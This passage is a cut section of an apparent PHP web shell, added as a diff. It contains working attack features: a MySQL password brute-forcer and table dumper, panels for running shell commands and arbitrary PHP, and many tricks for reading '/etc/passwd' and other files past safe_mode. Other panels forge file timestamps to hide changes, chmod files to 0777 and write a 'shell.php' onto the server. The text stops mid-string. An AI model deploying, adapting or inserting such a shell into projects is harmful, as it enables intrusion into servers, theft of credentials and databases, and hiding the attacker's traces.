if($sql->connect()) { echo "[+] $user:".strrev($user)." 
- success\r\n"; $suc++; } + } + } + }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){ + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $user; + if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; } + } + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } + +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} } + else { echo "[-] ERROR! 
Can't write in dump file"; } + } + } + +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; + +function div_title($title, $id) +{ + return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>'; +} +function div($id) + { + if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">'; + $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39'); + if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } + +if(!$safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; + + + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id20').$table_up2.div('id20').$ts; +echo "<table class=table1 width=100% align=center>"; +echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} + +if($unix && @function_exists('touch')){ +echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"]))) +.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>" +.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):("")))); +echo sr(15,"<b> or set Day".$arrow."</b>", +' +<select name="day" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option 
value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +</select>' +.ws(4)."<b>Month".$arrow."</b>" +.' +<select name="month" size="1"> +<option value="January">January</option> +<option value="February">February</option> +<option value="March">March</option> +<option value="April">April</option> +<option value="May">May</option> +<option value="June">June</option> +<option value="July">July</option> +<option value="August">August</option> +<option value="September">September</option> +<option value="October">October</option> +<option value="November">November</option> +<option value="December">December</option> +</select>' +.ws(4)."<b>Year".$arrow."</b>" +.' +<select name="year" size="1"> +<option value="1998">1998</option> +<option value="1999">1999</option> +<option value="2000">2000</option> +<option value="2001">2001</option> +<option value="2002">2002</option> +<option value="2003">2003</option> +<option value="2004">2004</option> +<option value="2005">2005</option> +<option value="2006">2006</option> +<option value="2006">2007</option> +<option value="2006">2008</option> +<option value="2006">2009</option> +<option value="2006">2010</option> +</select>' +.ws(4)."<b>Hour".$arrow."</b>" +.' 
+<select name="chasi" size="1">
+<option value="01">01</option>
+<option value="02">02</option>
+<option value="03">03</option>
+<option value="04">04</option>
+<option value="05">05</option>
+<option value="06">06</option>
+<option value="07">07</option>
+<option value="08">08</option>
+<option value="09">09</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+</select>'
+.ws(4)."<b>Minute".$arrow."</b>"
+.'
+<select name="minutes" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+<option value="32">32</option>
+<option value="33">33</option>
+<option value="34">34</option>
+<option value="35">35</option>
+<option value="36">36</option>
+<option value="37">37</option>
+<option value="38">38</option>
+<option value="39">39</option>
+<option value="40">40</option>
+<option value="41">41</option>
+<option value="42">42</option>
+<option value="43">43</option>
+<option value="44">44</option>
+<option value="45">45</option>
+<option value="46">46</option>
+<option value="47">47</option>
+<option value="48">48</option>
+<option value="49">49</option>
+<option value="50">50</option>
+<option value="51">51</option>
+<option value="52">52</option>
+<option value="53">53</option>
+<option value="54">54</option>
+<option value="55">55</option>
+<option value="56">56</option>
+<option value="57">57</option>
+<option value="58">58</option>
+<option value="59">59</option>
+</select>'
+.ws(4)."<b>Second".$arrow."</b>"
+.'
+<select name="second" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+<option value="32">32</option>
+<option value="33">33</option>
+<option value="34">34</option>
+<option value="35">35</option>
+<option value="36">36</option>
+<option value="37">37</option> +<option value="38">38</option> +<option value="39">39</option> +<option value="40">40</option> +<option value="41">41</option> +<option value="42">42</option> +<option value="43">43</option> +<option value="44">44</option> +<option value="45">45</option> +<option value="46">46</option> +<option value="47">47</option> +<option value="48">48</option> +<option value="49">49</option> +<option value="50">50</option> +<option value="51">51</option> +<option value="52">52</option> +<option value="53">53</option> +<option value="54">54</option> +<option value="55">55</option> +<option value="56">56</option> +<option value="57">57</option> +<option value="58">58</option> +<option value="59">59</option> +</select>' +.in('hidden','cmd',0,'touch') +.in('hidden','dir',0,$dir) +.ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + +$select=''; +if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";} +if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";} +if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";} +if($unix && $select){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts; +echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo 
$fs.$table_up1.div_title($lang[$language.'_text7'],'id5555').$table_up2.div('id5555').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id50').$table_up2.div('id50').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; + +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." 
* ( /root;/home;$tempdir )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} + +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id800').$table_up2.$font; +echo "<div align=center>".div('id800')."<textarea name=php_eval cols=100 rows=10>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"egy_spider.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; + +echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id520').$table_up2.div('id520').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id500').$table_up2.div('id500').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id510').$table_up2.div('id510').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id800').$table_up2.div('id800').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id900').$table_up2.div('id900').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id980').$table_up2.div('id980').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'Paralyzing been planted and you can usefilename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id801').$table_up2.div('id801').$ts; +echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id5505').$table_up2.div('id5505').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + +echo $fs.$table_up1.div_title($lang[$language.'_text151'],'id1221').$table_up2.div('id1221').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test_5_2_6',85,(!empty($_POST['test_5_2_6'])?($_POST['test_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + +echo $fs.$table_up1.div_title($lang[$language.'_text161'],'id12211').$table_up2.div('id12211').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_5_2_6',85,(!empty($_POST['test2_5_2_6'])?($_POST['test2_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text162'],'id9820').$table_up2.div('id9820').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +echo 
$fs.$table_up1.div_title($lang[$language.'_text163'],'id9820').$table_up2.div('id9820').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_perl').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text170'],'id2221').$table_up2.div('id2221').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','egy_4_2_0',96,(!empty($_POST['egy_4_2_0'])?($_POST['egy_4_2_0']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_4_2_0').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>". +"<option value=3 selected>[ 3 ] (<1 sec (default))</option>". +"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>"; +echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up3.div('id27').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? 
